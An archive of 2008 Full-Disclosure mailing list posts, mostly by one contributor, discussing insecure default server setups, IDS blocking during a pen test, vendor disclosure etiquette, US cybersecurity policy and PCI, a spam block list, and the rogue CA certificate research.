>you'd realize
>this very scenario occurs almost on a daily basis and the "owners"
>are
>perfectly happy with their dreg-filled completely insecure
>"servers" running on
>Windows XP SP1.
>
>--
>Paul Schmehl
>As if it wasn't already obvious,
>my opinions are my own and not
>those of my employer.
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAkg26R8ACgkQi04xwClgpZhnggP/csi9CIZ0cDkOsiKY9JiLklvXlsza
tKrHqNtqkhVwSd2J4H5IWKHd1p8Gr/KM7QAyJvLo8gsOgrjspUzJISPqBGVUDBGj/aa0
zp/NCqbyeVlp5UX7j49bUyCtbZMQ/j5oxJSTg0iag2BXIWx1xgEf+XiwkwTxOZmYaWmy
i+s7lwI=
=Yv1C
-END PGP SIGNATURE-

--
Click to see huge collection of designer watches.
http://tagline.hushmail.com/fc/Ioyw6h4diTNZQSUCsmCO7tLISg1VmGZiJIb9U6fdLVATcvkNbwUmxi/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] AppScan and IDS evasion

2008-05-24 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

The out of the box ruleset for SmartDefense on the FW1 does some
basic string checking on web traffic(i.e. checking get and post
variables for sql injection and xss etc.) along with some strict
RFC checks, I don't know to what extent though...

Elazar

On Sat, 24 May 2008 10:46:43 -0400 Roman Medina-Heigl Hernandez
<[EMAIL PROTECTED]> wrote:
>Pen Testing escribió:
>
>> I've launched AppScan against a web application and I'm being
>> blocked/banned (since I have a dynamic IP I can reboot my router
>and
>> get another IP, which is shortly banned again, as long as the
>attack
>> persists). Since AppScan doesn't have any kind of IDS evasion
>(AFAIK),
>> what could I do?
>
>Are you using the default template/policy? Perhaps you could edit
>it and/or
>create a new (and more relaxed) one by disabling potentially
>detectable
>checks... No idea about which checks you should eliminate...
>
>> PS: I don't know which kind of IDS is in use (perhaps it's not a
>> full-IDS but some anomaly detection as the one included in
>Checkpoint
>> FW-1 but I don't have that information).
>
>Any of you have more info about the kind of checks FW1 use?
>
>--
>
>Saludos,
>-Roman
>
>PGP Fingerprint:
>09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
>[Key ID: 0xEAD56742. Available at KeyServ]
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkg40ygACgkQi04xwClgpZiWngP/dBsvmll9gPI3XyVbK1jZiTRqRkmb
0MyJET1rz9AoPxqy9+rmvD3PARooALn8CpolXtYfjsfJr8r4qcBE6gc3zEPkNKHqRyTT
2bBnNS3teY1nhtcGPHqc8HH1++UBIvYOy+BEtAS6WUJy37qJ0dd9A3UcVqhhas0hsljn
ur6a3mg=
=MS2U
-END PGP SIGNATURE-

--
Right on time. Click now for great project management software!
http://tagline.hushmail.com/fc/Ioyw6h4dJ9PXwsePTgPKtnoK6TUdFxGEMpm1tFYqRR65UrImZy06AQ/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Need some help with management

2008-05-25 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Yup, CCEs and default configurations/passwords are definitely quite
common. The folks over at gnucitizen have been hitting on this for
some time with their work on the bt home hub...

Elazar

On Fri, 23 May 2008 12:16:45 -0400 Paul Schmehl
<[EMAIL PROTECTED]> wrote:
>--On Friday, May 23, 2008 11:56:15 -0400 Elazar Broad
><[EMAIL PROTECTED]>
>wrote:
>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> Its not even funny how often this happens. I have a friend who
>does
>> some consulting work for small businesses, and the amount of
>times
>> that he has come across medical practices that run their billing
>> and record keeping software on the same "fully-loaded" XP box
>that
>> their receptionist(s) use to download random crap...
>>
>
>Typical scenario - professor runs Windows XP with Skpe and Google
>Toolbar and a
>host of other "helpful" desktop applications - oh, but that's his
>"server" too
>- running IIS and mysql - default installs, mind you - replete
>with cross-site
>scripting and sql injection problems - and all his research with
>no backups -
>and then gets irate because his computer gets blocked at the
>switch port for
>policy violations.
>
>I could go on, but you get the idea.
>
>Why do they do it?  Because they can - at least until we catch
>them.
>
>How many mysql installs do you think there are worldwide,
>listening on the
>default port, with "[EMAIL PROTECTED]", "[EMAIL PROTECTED]", "@localhost" and
>"@FQHN" all
>in the default state with no password?
>
>--
>Paul Schmehl
>As if it wasn't already obvious,
>my opinions are my own and not
>those of my employer.
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkg5iakACgkQi04xwClgpZghQgP9H9a9uQNzPe2O6RZ0IWJ4IAlMWRiH
A4S8uQ5WRA5IpwVtq5mbKPxjemXziyBPmeNbUQcOw0ommho9L+invuTr0JmgOlPlPDj/
+cShHRfnwyuQH+UJW4W6tYI7QTY7mw+KenGQ2/dcdeRDQdLXFeBs5CvemM9aQ1Lm4WY0
U8FoTgQ=
=SdpU
-END PGP SIGNATURE-

--
Click to create your dream holiday trip now.
http://tagline.hushmail.com/fc/Ioyw6h4eO7NyyZb6Q8LWimgLvmFKntEPFrRw2cnGZNjsjUAICHl7YU/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Autodesk Security Contact

2008-06-16 Thread Elazar Broad

Does anyone have a security contact for Autodesk?

elazar

--
Let great B to B marketing solutions propel your brand to new heights! Click 
now!
http://tagline.hushmail.com/fc/Ioyw6h4euHqyTMpSKWWGNSUg4MAvp9z9bcMg7Dx2cKwC9V6EIDLvFO/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Panda ActiveScan 2.0 remote code execution

2008-07-04 Thread Elazar Broad

"We are an impatient lot in this community." - well said...

On Fri, 04 Jul 2008 08:59:40 -0400 "Randal T. Rioux" 
<[EMAIL PROTECTED]> wrote:
>On Fri, July 4, 2008 7:02 am, Panda Security Response wrote:
>> Please allow at least one week for us to respond before public
>> disclousure. We only received this information a few days ago.
>>
>> Regards,
>>
>> -- Pedro Bustamante 
>Senior
>> Research Advisor Panda Security
>
>It takes a week to hit the "respond" button? At least be polite 
>and read
>your mail, perhaps with a quick "stand by, we're looking into it" 
>response
>so folks think you care.
>
>We are an impatient lot in this community.
>
>
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/

--
Compete with the big boys.  Click here to find products to benefit your 
business.
http://tagline.hushmail.com/fc/Ioyw6h4eDJdoYMf9jwXhRS1vcQ5SY7Clj2fZDwCxnPavpwEfO6QAkA/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-08 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

They ain't called beltway bandits for nothing...

On Mon, 08 Dec 2008 23:28:52 -0500 "Rafal @ IsHackingYou.com"
<[EMAIL PROTECTED]> wrote:
>Ivan, all,
>
>Hold the phone...$5k-$7k to fix an infected device!?  Really?
>HOLY
>CRAP... either that's a completely made-up "FUD" figure, or the
>government
>contractors are making *way* too much money off my taxes.
>
>__
>Rafal M. Los
>IT Security - Response | Mitigation | Strategy
>
>E-mail:  [EMAIL PROTECTED]
> - Blog: http://preachsecurity.blogspot.com
>
>--
>From: "Ivan ." <[EMAIL PROTECTED]>
>Sent: Monday, December 08, 2008 5:14 PM
>To: "Full-Disclosure mailing list" [EMAIL PROTECTED]>
>Subject: [Full-disclosure] U.S. Is Losing Global Cyberwar,
>Commission Says
>
>>
>http://www.businessweek.com/bwdaily/dnflash/content/dec2008/db20081
>27_817606.htm
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAkk99owACgkQi04xwClgpZjY7AP/U3/nVeboctT47VJv9/ZmVY3EG6uE
0oJhSZBqOtwJwu8RpXLGHpMj7iVkWEOAdI+iaEdZsWC+yGnvAkUUI4xnHkA3gKfzSB9j
gvG8XT/bcrbsON3dF9NOrb2hzdq8DqPbgDAIEg5wR3k3gXjrMap3BoIchz5g06HA18ih
INTTfno=
=3ZDD
-END PGP SIGNATURE-

--
Save hundreds on an Unsecured Loan - Click here.
 
http://tagline.hushmail.com/fc/PnY6qxtViPpZpPq5YJjtAbu0xAEgHnQ9Is2jctQdjJChMVzyH6VQE/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] We're letting the bad guys win

2008-12-09 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Brilliant use of deflection, keep it up, you might end up as some
loser serial rapist on Law and Order, oh wait, they want actor's,
not the real thing...

On Tue, 09 Dec 2008 11:55:08 -0500 n3td3v <[EMAIL PROTECTED]>
wrote:
>On Tue, Dec 9, 2008 at 3:08 PM, Paul Schmehl
><[EMAIL PROTECTED]> wrote:
>> --On Tuesday, December 09, 2008 00:25:18 -0600
>[EMAIL PROTECTED] wrote:
>>
>>>
>>> On Tue, 09 Dec 2008 04:03:57 GMT, n3td3v said:
 We need to stop this back and forth fighting its making
>infosec look
 bad, this isn't what infosec should be about.
>>>
>>> It's making one very small insignificant corner of infosec look
>bad.
>>>
>>> Let's keep a sense of perspective, guys.
>>
>> Or, to look at it another way, it's tying up all the idiots in
>one place and
>> keeping the rest of infosec unsullied.  :-)
>>
>
>I agree,
>But full-disclosure shouldn't be full of idiots so why do we let
>it be
>that way. It's because we reply to them that it happens. I was
>gullible and naive to reply to them, i'm not replying to them
>anymore.
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkk+qhEACgkQi04xwClgpZg3kQP9GEBAH9byz3/fJKvWHN9IFX0ycf17
0LS0fUg/5BRHXck+a2uEZsNujlKoMYyl1XshW+HWH0rwmDTw/1S88vCqULiqiMI7yXD0
G01L1MDkA+dM9ntF0IHSPUz3r2a4qVfP4D8o6KB45oDizZOLiCB5zGQdV5g1hwlHEBsL
KMecN/o=
=dDzW
-END PGP SIGNATURE-

--
Click for free info on getting an MBA, $200K/ year potential.
 
http://tagline.hushmail.com/fc/PnY6qxsZwUO4JCrKLyAXmX1gJtIyy84Kr2W2NrYeIgv5LuxCIhDBW/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-09 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I think most of us realize that even with the hard work of many
good people in and out of the security industry this country's
cyber security amounts to some swiss cheese, and there is plenty of
blame to go around. Let's face it though, no one thinks that by
failing to properly secure their computer and/or information they
could possibly be aiding our terrorist friends. For one, there have
been been links between funding for various groups and carding.
Changing the public opinion and mindset might go a long way
especially if its something like "your credit card could be funding
the next 911", that's just a though though. As for those who have
been there, done that, all your work isn't for naught. I may not
like his tax plan, but Obama definitely is headed in the right
direction by appointing a CTO for this country as well as taking
cyber security seriously. Its about damned time!

On Tue, 09 Dec 2008 01:13:44 -0500 James Matthews
<[EMAIL PROTECTED]> wrote:
>They are trying to get the government to do something about it.
>But unless
>they see the danger not just hear about it nothing will happen.
>
>Consider remarks before Congress last year by O. Sami Saydjari,
>CEO of Cyber
>Defense Agency <http://www.cyberdefenseagency.com/>, a security
>research and
>consulting firm, and a former official at the Defense Dept.'s
>research arm,
>DARPA. Following a major cyber-attack, he told legislators,
>electricity,
>banking, and communications could all go dead, leaving Americans
>scrounging
>for food, water, gasoline—even hunks of firewood traded on the
>black market.
>
>
>On Tue, Dec 9, 2008 at 6:39 AM, Elazar Broad <[EMAIL PROTECTED]>
>wrote:
>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> They ain't called beltway bandits for nothing...
>>
>> On Mon, 08 Dec 2008 23:28:52 -0500 "Rafal @ IsHackingYou.com"
>> <[EMAIL PROTECTED]> wrote:
>> >Ivan, all,
>> >
>> >Hold the phone...$5k-$7k to fix an infected device!?
>Really?
>> >HOLY
>> >CRAP... either that's a completely made-up "FUD" figure, or the
>> >government
>> >contractors are making *way* too much money off my taxes.
>> >
>> >__
>> >Rafal M. Los
>> >IT Security - Response | Mitigation | Strategy
>> >
>> >E-mail:  [EMAIL PROTECTED]
>> > - Blog: http://preachsecurity.blogspot.com
>> >
>> >--
>> >From: "Ivan ." <[EMAIL PROTECTED]>
>> >Sent: Monday, December 08, 2008 5:14 PM
>> >To: "Full-Disclosure mailing list" > >[EMAIL PROTECTED]>
>> >Subject: [Full-disclosure] U.S. Is Losing Global Cyberwar,
>> >Commission Says
>> >
>> >>
>>
>>http://www.businessweek.com/bwdaily/dnflash/content/dec2008/db2008
>1
>> >27_817606.htm
>> >>
>> >> ___
>> >> Full-Disclosure - We believe in it.
>> >> Charter: http://lists.grok.org.uk/full-disclosure-
>charter.html
>> >> Hosted and sponsored by Secunia - http://secunia.com/
>> >>
>> >
>> >___
>> >Full-Disclosure - We believe in it.
>> >Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >Hosted and sponsored by Secunia - http://secunia.com/
>> -BEGIN PGP SIGNATURE-
>> Charset: UTF8
>> Version: Hush 3.0
>> Note: This signature can be verified at
>https://www.hushtools.com/verify
>>
>>
>wpwEAQECAAYFAkk99owACgkQi04xwClgpZjY7AP/U3/nVeboctT47VJv9/ZmVY3EG6u
>E
>>
>0oJhSZBqOtwJwu8RpXLGHpMj7iVkWEOAdI+iaEdZsWC+yGnvAkUUI4xnHkA3gKfzSB9
>j
>>
>gvG8XT/bcrbsON3dF9NOrb2hzdq8DqPbgDAIEg5wR3k3gXjrMap3BoIchz5g06HA18i
>h
>> INTTfno=
>> =3ZDD
>> -END PGP SIGNATURE-
>>
>> --
>> Save hundreds on an Unsecured Loan - Click here.
>>
>>
>http://tagline.hushmail.com/fc/PnY6qxtViPpZpPq5YJjtAbu0xAEgHnQ9Is2j
>ctQdjJChMVzyH6VQE/
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
>--
>http://www.goldwatches.com/
>
>http://www.jewelerslounge.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkk+qOQACgkQi04xwClgpZiq9gP9EeZu+SyMqKR/VUP3dYa2Wgj7IbCX
WcjA34deDCJFfIQNnkDUZITFku/ugnbMpEhQrKd2NtGvo3jexSNRYpn+Zi6bHn/scPXE
QYfCylQQ1gVjM/CaUiQ6PABRXFH0KDrtKu25s462gL5EQpWBP2DwJlr+HXKCeo3K2duu
f+OGess=
=A69b
-END PGP SIGNATURE-

--
Become a Graphic Designer and earn up to $150/ hour. Click here.
 
http://tagline.hushmail.com/fc/PnY6qxunKiA5qG9iu3IFnWxOgn8cMwJhcEQznn9mrCUm2PgdpHhhe/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-09 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I never said we need to do something, passive awareness *can* go a
long way...

On Tue, 09 Dec 2008 13:12:25 -0500 [EMAIL PROTECTED] wrote:
>On Tue, 09 Dec 2008 12:20:36 EST, Elazar Broad said:
>> Changing the public opinion and mindset might go a long way
>> especially if its something like "your credit card could be
>funding
>> the next 911", that's just a though though.
>
>Do you *really* want to go there?
>
>We *already* have enough problems with stupid things being done in
>the name
>of "but there might be terrorists".
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkk+uEgACgkQi04xwClgpZj3oQP/Sqts4WvqvrWNNSqY409hY7o9l7As
FyGxwqfmldivGkfSqUmNwF/PF4ops+bkgVM/K4upBjixnuq3Dgqw1y42oAzoMQ2LN34H
vvVoSCStZLb4aCnVzw1sZo7EYh+QfsCtnutL1tmTpxkPdaFeIzOpGlmyfDtHhflUdry3
OgDEta0=
=w5Df
-END PGP SIGNATURE-

--
Study to be a Paralegal at a school near you.  Click here to get free info now.
 
http://tagline.hushmail.com/fc/PnY6qxt7fLFU3igrzUilnRHkxwGqteI2Gdqa8YE0gbQR5G9Ce9352/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-09 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Neither, because ultimately no one cares, and that is why the
financial industry foots the 60 billion identity theft bill. My
rant was a little bit of wishful thinking and a shred of belief in
the human race...

On Tue, 09 Dec 2008 13:51:57 -0500 [EMAIL PROTECTED] wrote:
>On Tue, 09 Dec 2008 13:26:15 EST, Elazar Broad said:
>> I never said we need to do something, passive awareness *can* go
>a
>> long way...
>
>Right.  The danger is that you want to give the people a *reason*
>to
>care.
>
>"If you're not careful, your account could be emptied and you'll
>be very
>surprised at the checkout lane of the local grocery when you can't
>pay".
>
>"OMG Terrorists might get your money"
>
>Which one is a better reason, and why?
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkk+yfUACgkQi04xwClgpZhdNAP/YAa0QXovgmZtZwyvBvhT7Cs4lPcy
oaCS3061PGB337TvvHSxKlB10oZtv8b9WvWmlDXjW1hlWKMFXnv6whEkCwbvVIFv89v9
/Ml8BMPSYbBP3HK9oWBJcHwS6gGbE1ypSMNPc3ITGHPgardKKooE1QvuKPUk6i4s9QcX
qp+V/pc=
=Qx+O
-END PGP SIGNATURE-

--
Have a nack for decorating?  Click here to earn money from your passion.
 
http://tagline.hushmail.com/fc/PnY6qxunOkEGI96P0iGLBigF0CGVDxjAx728XDQZeEQwHPV1ywA6M/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-09 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

The no one refers to your average joe consumer, not the PCI SSC, I
am well aware that there is no easy solution, however, at the same
time, why worry about something when someone else can worry and pay
for you...

On Tue, 09 Dec 2008 14:53:29 -0500 Luke Scharf <[EMAIL PROTECTED]>
wrote:
>Elazar Broad wrote:
>> Neither, because ultimately no one cares, and that is why the
>> financial industry foots the 60 billion identity theft bill. My
>> rant was a little bit of wishful thinking and a shred of belief
>in
>> the human race...
>>
>
>Having been a student in a computer-security training class taught
>by
>one of the people who helps banks deal with these problems, I'd
>say
>you're wrong.  This is a hard set of problems.  Smart people are
>working
>on it -- not everywhere, but in enough places to make a
>difference.
>
>Read the PCI and learn its role in the financial industry.  Then
>this
>conversation will become interesting.  Here's a link to get you
>started:
>http://en.wikipedia.org/wiki/PCI_DSS
>
>-Luke
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkk+2kMACgkQi04xwClgpZjzzAP9EOvAddw++Xrsf884PLWLGMN4tl4y
7NBKQ1e96HLPtvFpXICElurdgW/n5xyZDBmxjW1NCk5ZOsc8QkWOia14XTGiI8wpZzEG
pP2VpLmQYPYJyKOWK876r5niC+qPBO9vke9fOFfpXMKfel0jn5uQdQuiwTBeWLZZ/MTf
pTsxUNs=
=1qIG
-END PGP SIGNATURE-

--
Click here to become a professional counselor in less time than you think.
 
http://tagline.hushmail.com/fc/PnY6qxultlSgRujflAciO4AuCy5clpFyY7ahAz5zo23sE6o4ryQSc/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-10 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Financial IT has much competence, the problem is the red tape and
politics that many face when trying to get the job done, but then
again, you have that everywhere, I am just venting/lamenting over
it...

On Wed, 10 Dec 2008 12:23:38 -0500 Luke Scharf
<[EMAIL PROTECTED]> wrote:
>Michael Krymson wrote:
>> Like tiny Link holding the almighty Triforce braced overhead
>glinting in the
>> sunlight, so too shall we raise up PCI to the heavens as our
>shining,
>> guiding light of all things good; it will save us from all
>evils, so shall
>> it be...
>>
>> You should revisit this opinion after you're out of school and
>in the
>> workforce for 5 years. :)
>>
>
>The OP seemed to think that there was no competence in financial
>IT.  I
>know firsthand that  are some smart people, but, like everywhere
>else,
>there must be more than enough morons too -- especially given what
>I've
>been hearing in the news, lately.
>
>But, hey, I work in academia, not the financial industry and I
>should
>better than to post to FD -- so, whatever.  *shrug*
>
>-Luke
>
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAkk//qgACgkQi04xwClgpZh+rgP/cvuk1UUANZZI8DITKfOXDaKH9M1I
gv5dKJVBWkk5UulB1QX7f2h0VALh5iGgS4UIOoRA7OJNsiJXaLwKMxAKpDvdouJDHNKd
b6PTCqT3GvS7JSR2QVqNkhDCmuyoC52ZGsWc4zXvo1fv16D30JnFGUgx+OSN8u1R5l8b
2nOnGyY=
=253G
-END PGP SIGNATURE-

--
Click here for free information on business phone systems from top companies.
 
http://tagline.hushmail.com/fc/PnY6qxu9tWBLk71Xl9cycxiWlxre6C3YgHWw4ZPSMTuljZWL8GEO0/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-10 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

"You should revisit this opinion after you're out of school and in
the workforce for 5 years. :)"

6 years and counting, a little cynicism never hurt anyone. On a
side note, I am well aware of the impact that PCI has had on the
industry(currently involved in a project which falls in the realm
of PCI compliance), those on the council as well as the those in
the field pushing and advocating the standards have done some great
work, unfortunately(and it is not their fault), its not enough...

On Wed, 10 Dec 2008 11:27:19 -0500 Michael Krymson
<[EMAIL PROTECTED]> wrote:
>Like tiny Link holding the almighty Triforce braced overhead
>glinting in the
>sunlight, so too shall we raise up PCI to the heavens as our
>shining,
>guiding light of all things good; it will save us from all evils,
>so shall
>it be...
>
>You should revisit this opinion after you're out of school and in
>the
>workforce for 5 years. :)
>
>On Tue, Dec 9, 2008 at 1:53 PM, Luke Scharf <[EMAIL PROTECTED]>
>wrote:
>
>> Elazar Broad wrote:
>> > Neither, because ultimately no one cares, and that is why the
>> > financial industry foots the 60 billion identity theft bill.
>My
>> > rant was a little bit of wishful thinking and a shred of
>belief in
>> > the human race...
>> >
>>
>> Having been a student in a computer-security training class
>taught by
>> one of the people who helps banks deal with these problems, I'd
>say
>> you're wrong.  This is a hard set of problems.  Smart people are
>working
>> on it -- not everywhere, but in enough places to make a
>difference.
>>
>> Read the PCI and learn its role in the financial industry.  Then
>this
>> conversation will become interesting.  Here's a link to get you
>started:
>>http://en.wikipedia.org/wiki/PCI_DSS
>>
>> -Luke
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpsEAQECAAYFAkk//FkACgkQi04xwClgpZgMQAP4wPXhHHNSUdNuxFIwP3OXChR4kuID
orrJj0QyJn9kvz7b8B3J00g5xrTAOr51HXECr6uPE1YXl9LqvBxt41mqznml8pttVoQt
F7hF2uQ4TBMGc0I7EXOxfHgRKRnyhvN1yDhkmQl51bT7fw94ISWYYQhTvscnRMkV4R26
tiSHOg==
=Avgu
-END PGP SIGNATURE-

--
Click for free information on earning a medical transcriptionist degree.
 
http://tagline.hushmail.com/fc/PnY6qxthN5XQLNMTzhTyL6rrUEkhz4FESxwZfHZaXjMaNHKOpaXrS/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Barracuda Reputation Block List

2008-12-22 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Barracuda opened this up to the public back in September, see
http://www.barracudacentral.org/rbl. I have been using it for about
2 months or so, it seems to be pretty effective. Is anyone else out
there using it? What do you think?

elazar
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAklQHuEACgkQi04xwClgpZhh5QP8D3SB52oQNBj+PrJYxw9hImgZiznE
Qa3XJmAOn2b7f1P/1oPCIoByjcLGe6U4J8+JJUl3QPr3P4wgAwHMqbf3Yy+4doBTVGnB
4jOKHSQ+wP+lz/hMUMTJMAnQGgLhcgt7ulRNi8WMYcHAsVyl5uxu8l+WMQq2FhuYxUfm
m57Hxz8=
=GX/H
-END PGP SIGNATURE-

--
Not having a degree dragging you down?? Click here for free information.
 
http://tagline.hushmail.com/fc/PnY6qxtpfWJSSKs8QEHNNaIVpHqi0Ph0jajkuMOaz4rQFSSwqjohy/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] This list has run its course

2008-12-22 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

April Fools isn't for another 4 months...

On Mon, 22 Dec 2008 17:53:29 -0500 n3td3v 
wrote:
>Real researchers who should be taken seriously aren't taken
>seriously anymore.
>
>I'm leaving full-disclosure because of the abuse.
>
>It's just turned into flames to spin people up, I don't get a
>chance
>to talk about security or my skill set.
>
>It's abuse after abuse after abuse.
>
>Sorry, I can't take it anymore.
>
>Got to go, bye.
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAklQHVoACgkQi04xwClgpZh64gP9HfSRAYDsGleNNaWKJKY4woDcJ85d
llcV33lEtFD/pXMn5sJzOdP3xzQ4vigGkeFHM1+hQy5UMHIDtY6TjYTzIaYvFHKphRnd
Xv828AYS0GvwNYe11TJJTD34wUKs6IzcweR21eqII6hxeLatNL84mb28AqX1B7cvBv6l
+blc0Zo=
=M6iw
-END PGP SIGNATURE-

--
Click here to find a massage therapy school near you. 
 
http://tagline.hushmail.com/fc/PnY6qxsbdamgK4d3psO6ioVZG9T4qtPVx3T2D1azbCaODPxTcX1Kw/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Creating a rogue CA certificate

2008-12-30 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SSL/PKI is only as strong as the weakest CA...

For those of you who haven't been following this, here you go:

http://www.win.tue.nl/hashclash/rogue-ca/
http://www.phreedom.org/research/rogue-ca/md5-collisions-1.0.ppt

Enjoy and Happy New Years!

elazar
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

